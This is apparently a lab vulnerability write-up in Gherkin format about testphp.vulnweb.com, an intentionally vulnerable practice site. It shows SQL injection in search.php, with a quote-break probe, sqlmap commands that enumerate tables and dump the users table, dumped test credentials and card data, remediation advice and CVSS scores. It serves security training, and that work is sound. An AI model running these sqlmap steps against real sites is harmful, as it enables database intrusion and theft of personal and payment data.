## Version 1.4.1
## language: en

Feature:
  TOE:
    acuart
  Category:
    Insecure Storage of Sensitive Information
  Location:
    http://testphp.vulnweb.com/search.php?test=query
  CWE:
    CWE-922: Insecure Storage of Sensitive Information
  Rule:
    REQ.185: https://fluidattacks.com/web/rules/185/
    REQ.186: https://fluidattacks.com/web/rules/186/
    REQ.300: https://fluidattacks.com/web/rules/300/
  Goal:
    Get all user information.
  Recommendation:
    Encrypt info like credit cards and give minimum privileges for DB access.

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali GNU        | 2019.2      |
    | firefox         | 52.9.0      |
    | sqlmap          | 1.3.7.7     |
  TOE information:
    Given I have access to the url http://testphp.vulnweb.com
    And entered /search.php
    And the server is running nginx version 1.4.1
    And PHP version 5.3.10
    And MySQL version 5.0.12

  Scenario: Normal use case
    Given I access http://testphp.vulnweb.com/
    And click on the go button
    Then I can see http://testphp.vulnweb.com/search.php?test=query
    Then all results are displayed

  Scenario: Static detection
    When I do not have access to the source code
    Then I am not able to do static detection.

  Scenario: Dynamic detection
    Given a query is included in the search url
    Then I can try to break the SQL query by accessing the following page:
    """
    http://testphp.vulnweb.com/search.php?test=1%27
    """
    Then I get the output:
    """
    Warning: mysql_fetch_array() expects parameter 1 to be resource,
    boolean given in /hj/var/www/search.php on line 61
    """
    Then I know I can get accesss to the DB
    And since sqlmap can detect and exploit SQLi to take over DB servers
    Then I can execute the following command:
    """
    python sqlmap.py -u http://testphp.vulnweb.com/search.php?test=query -a
    """
    And it returns all the database information
    Then I can conclude that user information can be accessed through the DB.
    And I can see that sensitive information is stored plain text.

  Scenario: Exploitation
    Given a query is included in the url
    And sqlmap can detect and exploit SQLi to take over DB servers
    Then I can execute the following command:
    """
    python sqlmap.py -u http://testphp.vulnweb.com/search.php?test=query
    --tables
    """
    Then I get the output:
    """
    Database: acuart
    [8 tables]
    +---------------------------------------+
    | artists                               |
    | carts                                 |
    | categ                                 |
    | featured                              |
    | guestbook                             |
    | pictures                              |
    | products                              |
    | users                                 |
    +---------------------------------------+
    """
    Then I try to get all user information
    And I execute the following command:
    """
    python sqlmap.py -u http://testphp.vulnweb.com/search.php?test=query
    --search -T users
    """
    Then I get the output:
    """
    Database: acuart
    Table: users
    [1 entry]
    +---------------------+------+----------------------------------+
    | cc                  | name | cart                             |
    +---------------------+------+----------------------------------+
    | 0000000000000000000 | test | b77873fbc52327fb6195dfcd1de69950 |
    +---------------------+------+----------------------------------+
    +------+-------+------------+--------------------------+---------+
    | pass | uname | phone      | email                    | address |
    +------+-------+------------+--------------------------+---------+
    | test | test  | 0516565858 | aaaaaaaaaaaa@hotmail.com | xtest   |
    +------+-------+------------+--------------------------+---------+
    [11:45:07] [INFO] table 'acuart.users' dumped to CSV file
    '/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
    [11:45:07] [INFO] fetched data logged to text files under
    '/root/.sqlmap/output/testphp.vulnweb.com'
    """
    And I gain access to the table
    Then I can conclude that all user info is being stored without protection

  Scenario: Remediation
    When sensitive data is stored in a DB
    Then it should be hashed or, preferably, handled by a payment gateway.
    And the connection to the DB should be encrypted
    Then third party access will be restricted

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.6/10 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.2/10 (High) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    9.5/10 (Critical) - CR:H/AR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:C/MC:H/MI:N/MA:N

  Scenario: Correlations
  vbd/acuart/0256-unprot-cred-store
    Given I have access to the database
    And SQL injections provided by 0256-unprot-cred-store
    When I exploit this vulnerability
    Then I can get all sensitive information in plain text